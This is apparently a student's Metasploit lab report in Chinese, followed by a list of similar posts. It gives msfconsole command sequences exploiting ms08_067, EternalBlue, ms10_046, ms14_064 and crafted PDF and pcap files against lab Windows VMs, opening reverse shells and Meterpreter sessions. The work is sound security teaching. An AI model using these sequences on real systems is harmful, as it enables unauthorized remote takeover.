2018-2019-2 网络对抗技术 20165304 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165304Exp5 MSF基础应用
原理与实践说明
1.实践原理
1).MSF攻击方法
主动攻击:扫描主机漏洞,进行攻击
攻击浏览器
攻击其他客户端
2).MSF的六个模块
查看六种模块源码目录/usr/share/metasploit-framework/modules
渗透攻击模块Exploit Modules:攻击漏洞,把shellcode"背"过去
辅助模块Auxiliary Modules:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提
攻击载荷Payload Modules:载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码
空字段模块Nop Modules
编码模块Encoders
后渗透攻击模块Post:攻击成功之后,动态传输代码使其在被控机执行
3).MSF的三种用户操作界面
msfconsole
- 查看模块的具体信息info [exploits|auxiliary|post|payloads|encoders|nops]
- 查看设置信息show [options]
- 查看攻击目标类型show [target]
- 查找命令search
- 查找2018年产生的在windows平台下的漏洞search ms18(或CNE:2018) type:exploit platform:windows
armitage - 启动服务器service postgresql start
- 启动armitagearmitage
webgui
4).MSF常用漏洞利用命令
search name:用指定关键字搜索可以利用的漏洞模块
use exploit name:使用漏洞
show options:显示配置选项
set option name option:设置选项
show payloads:回链攻击载荷
show targets: 显示目标(os版本)
set TARGET target number:设置目标版本
exploit:开始漏洞攻击
sessions -l:列出会话
sessions -i id:选择会话
sessions -k id:结束会话
Ctrl+z:把会话放到后台
Ctrl+c:结束会话
show auxiliary:显示辅助模块
use auxiliary name :使用辅助模块
set option name option:设置选项
exploit:运行模块
2.实践内容概述
一个主动攻击实践,如ms08_067; (1分)
一个针对浏览器的攻击,如ms11_050;(1分)
一个针对客户端的攻击,如Adobe;(1分)
成功应用任何一个辅助模块。(0.5分)
3.基础问题回答
用自己的话解释什么是exploit,payload,encode.
exploit是载具,连接漏洞,将payload传送到靶机中。
payload是载荷,是exploit中shellcode中的主要功能代码,exploit把它送到靶机中后,是真正负责进行攻击代码。
encode是编码,用来改变payload,避免payload中出现漏洞无法处理的字符;其次是为了实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。
攻击实例
主动攻击的实践
ms08-067
ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷,攻击可以获得一个相对高的权限。
靶机:Microsoft Windows 2000(10.0.0.112)
payload :generic/shell_reverse_tcp
测试靶机与攻击机之间能否ping通
攻击者试探靶机是否存在此漏洞nmap -sS -A --script=smb-vuln-ms08-067 -PO 10.0.0.112
查看到靶机的版本号

查看到靶机存在此漏洞

msfconsole打开控制台search ms08-067查看漏洞位置

use exploit/windows/smb/ms08_067_netapi选择该漏洞
set RHOSTS 10.0.0.112设置靶机IP
利用辅助模块查看端口是否开启(默认端口为445)
search portscan # 搜索端口 use auxiliary/scanner/portscan/tcp # 使用漏洞 show options #显示设置 set RHOSTS 10.0.0.112 # 设置监听者地址 exploit # 攻击

show targets查看targets,修改靶机的类型set target 1
show payloads查看可用payload

选择set generic/shell_bind_tcp
set LHOST 10.0.0.128设置监听者ip
set LPORT 5318设置监听者端口号
show options查看设置信息
exploit进行攻击,攻击成功!

ms17_010_eternalblue
靶机:Microsoft Windows 7
payload : windows/x64/shell/reverse_tcp_uuid
实验步骤
nmap --script=vuln 10.1.1.137 //查看靶机开放端口、是否存在ms17_010
search ms17_010 //搜索漏洞
use exploit/windows/smb/ms17_010_eternalblue //使用漏洞
show payloads //显示可用攻击载荷
set payload windows/x64/shell/reverse_tcp_uuid //选择攻击载荷
set LHOST 10.1.1.128 //设置监听地址
set LPORT 5304 //设置端口号
set RHOSTS 10.1.1.137 //设置靶机地址
show options //查看配置信息
exploit //开始攻击

攻击浏览器的实践
ms10_046
靶机:Windows 7 + IE8
exploit : exploit/windows/smb/ms10_046_shortcut_icon_dllloader
payload : windows/meterpreter/reverse_https
实验步骤
search ms10-046 //看看其他的exploit
use exploit/windows/smb/ms10_046_shortcut_icon_dllloader //使用漏洞
show payloads //显示可用攻击载荷
set windows/meterpreter/reverse_https //选择攻击载荷
show options //查看配置信息
set LHOST 10..1.128 //设置监听地址
set SRVHOST 10.1.1.128 //设置本地收听地址
set LPORT //设置端口号
exploit #开始攻击
将/root/.msf4/local/msf.lnk共享到win7虚拟机中,然后双击,即可在kail监听到,输入sessions查看当前会话,输入sessions -i 1即可选择第一个会话,然后就攻击成功.

靶机:WindowsXP+IE 8.0
exploit : windows/browser/ms14_064_ole_code_execution
payload : windows/meterpreter/reverse_tcp
实验步骤
use exploit/windows/browser/ms14_064_ole_code_execution //选择攻击模块
info //查看漏洞相关信息(发现可攻击winXP和win7)
show payloads //显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp //设置tcp反向连接
set SRVHOST 10.1.1.128 //设置攻方IP
set AllowPowerShellPrompt 1 //因为msf中自带的漏洞利用exp调用的是powershell。 所以msf中的exp代码只对安装powershell的系统生效
set LHOST 10.1.1.128
set LPORT 5304
set target 0 //设置winXP靶机
exploit //发起攻击
将生成的URL地址在winXP的IE中打开,发现成功建立了一个会话
输入sessions查看会话相关信息

输入sessions -i 1即可选择第一个会话,调用shell权限成功

攻击客户端
靶机:Windows XP
payload : windows/meterpreter/bind_tcp
实验步骤
msfconsole //进入控制台
search adobe //进行查找
use windows/fileformat/adobe_cooltype_sing //使用漏洞
info //查看漏洞具体信息(重点当然是description)
set payload windows/meterpreter/bind_tcp //选择攻击载荷
show options //查看详细信息
set LPORT 5304//设置端口号
set RHOST 10.1.1.161 //设置靶机IP地址
exploit #攻击
将生成的msf.pdf复制到Windows XP中
kail中输入back退出当前模块,进入监听模块
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/bind_tcp //选择攻击载荷
show options //查看详细信息
set RHOST 10.1.1.161 //设置靶机IP地址
set LPORT 5304 //设置端口号
exploit //攻击

靶机:Windows XP
payload : windows/meterpreter/reverse_tcp
实验步骤
msfconsole //进入控制台
use exploit/windows/fileformat/wireshark_packet_dect.rb //使用漏洞
info //查看漏洞具体信息(重点当然是description)
set payload windows/meterpreter/reverse_tcp //选择攻击载荷
set LHOST 10.1.1.128 //攻击者地址
set LPORT 5304 //设置端口号
set FILENAME 5304.pcap //设置文件名
show options //查看设置
exploit #攻击
将生成的5304.pcap复制到Windows XP中
kail中输入back退出当前模块,进入监听模块
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp //选择攻击载荷
set LHOST 10.1.1.128 //攻击者地址
set LPORT 5304 //设置端口号
exploit //攻击
在靶机中使用wireshark打开5304.pcap
攻击成功

离实战还缺些什么技术或步骤
本次实验操作起来比较简单,逻辑也很清晰,绝大多数的时间花费在了配置环境上。从windowsXP Professional sp2到windows XP SP3(English),从IE 6.0到IE 7.0/8.0,Adobe Reader11到9,着实感受到了配置环境的艰辛,也体会到了metasploit攻击漏洞的专一性,对操作系统和软件版本都有细致的要求。必须要在特定环境和特定触发条件下才能成功。如果放在实践中,搜寻可以攻击的模块也是一个非常漫长的过程。同时,我们的攻击是建立在前人的基础上,很多漏洞都是经过修复,不再适用,退一步来讲,即使我们知道了系统漏洞,怎样进行有效的攻击而不被发现又是一个巨大的难题。
2018-2019-2 网络对抗技术 20165304 Exp5 MSF基础应用的更多相关文章
- 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...
- 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...
- 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用 实践原理 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六个模块 查看 ...
- 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用
<网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...
- 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...
- 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...
- 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...
- 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8
<网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...
- 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...
随机推荐
- 0. General-purpose tools (通用工具 8个)
http://en.wikipedia.org/wiki/Netcat这个简单的实用程序通过TCP或UDP网络连接读写数据. 它被设计为一个可靠的后端工具,可以直接或轻松地使用其他程序和脚本驱动. 同 ...
- Python爬虫初学者学习笔记(带注释)
一,安装编程工具并进入编程界面 首先去https://www.continuum.io/downloads/网站下载Anaconda工具并安装;打开cmd,输入jupyter notebook并回车( ...
- 关于 lua table表存储函数且运用
--table 是lua的一种数据结构用来帮助我们创建不同的数据类型.如:数组和字典--lua table 使用关联型数组,你可以用任意类型的值来做数组的索引,但这个值不能是nil--lua tabl ...
- C++ 基于凸包的Delaunay三角网生成算法
Delaunay三角网,写了用半天,调试BUG用了2天……醉了. 基本思路比较简单,但效率并不是很快. 1. 先生成一个凸包: 2. 只考虑凸包上的点,将凸包环切,生成一个三角网,暂时不考虑Delau ...
- centos7镜像文件
1.打开网址https://www.centos.org/download/2.点击Minimall ISO 按钮 3.选择aliyun地址 4.centos版本介绍 在CentOS官方网站上,Ce ...
- zabbix自定义监控主机
目的: 从头开始自定义监控主机的磁盘.CPU.运行内存等 配置自动发现主机:设置ip地址范围,检查类型为zabbix客户端,端口未10050,键值为system.uname,设置唯一性准则为ip地址 ...
- oracle报错 ORA-02290: 违反检查约束条件问题
场景: 使用plsql/developer 将原本要求非空的字段 改为可以为空 然后在插入数据的时候 报错改字段约束条件还起作用 解决方案: 首先查询该表的约束条件 select * from u ...
- Java 异常: SimpleDateFormat java.lang.NumberFormatException: multiple points
Java SimpleDateFormat 是不支持多线程的.在不同线程同时用 一个 SimpleDateFormat 实例对象做日期装换,或抛出上面的 2 种 异常,所以 用到 SimpleDa ...
- jquery怎么选择嵌套的第一层的li
$(".ra").click(function(){ var id=$(this).children("ul").attr("id"); i ...
- 备份恢复工具xtrabackup安装和使用的记录
一.安装 下面的方法是在测试环境可以上网的情况下安装的: 提供的是在centos7上安装的方法: 包下载: wget https://www.percona.com/downloads/percona ...